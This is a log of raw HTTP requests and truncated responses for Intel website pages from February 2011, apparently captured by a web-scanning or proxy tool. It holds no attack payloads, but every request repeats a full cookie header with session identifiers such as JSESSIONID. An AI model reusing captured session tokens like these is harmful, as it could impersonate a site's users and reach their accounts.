GET /pressroom/kits/advancedtech/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37273
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel Advanced Technology - Behind the Doodles</title> ...[SNIP]...
GET /pressroom/kits/chipmaking/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 68338
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>From Sand to Silicon: the Making of a Chip</title> <! ...[SNIP]...
GET /pressroom/kits/embedded/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 54961
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>PRESS KIT - Smarter Devices with Intel® Embedded</ ...[SNIP]...
GET /pressroom/kits/sot/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37235
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>PRESS KIT - Intel: 'Sponsors of Tomorrow' Ad Campaign< ...[SNIP]...
GET /references/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36568
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Reference Room: Intel Business Success Stories</title> ...[SNIP]...
GET /sites/sitewide/survey/pix/ HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 404 Not Found Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Expires: Sat, 05 Feb 2011 23:17:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:17:54 GMT Content-Length: 18367 Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=FFJMGNPAIJEEEOOJKAPKMMCC; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a ...[SNIP]...
HTTP/1.1 404 Not Found Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Vary: Accept-Encoding Cache-Control: no-cache Expires: Sun, 06 Feb 2011 01:55:20 GMT Date: Sun, 06 Feb 2011 01:55:20 GMT Connection: close Content-Length: 18367
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a ...[SNIP]...
GET /technology/architecture-silicon/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:30 GMT Content-Length: 28153 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Architecture & Silicon Technology from Intel</titl ...[SNIP]...
GET /technology/manufacturing/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:32 GMT Content-Length: 29517 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel Manufacturing</title> <!-- DOC-FACTORY Gene ...[SNIP]...
GET /technology/product/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:31 GMT Content-Length: 31194 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel Product Technologies</title> <!-- DOC-FACTO ...[SNIP]...
GET /technology/turboboost/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:35 GMT Content-Length: 29505 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel® Turbo Boost Technology 2.0</title> <meta ...[SNIP]...
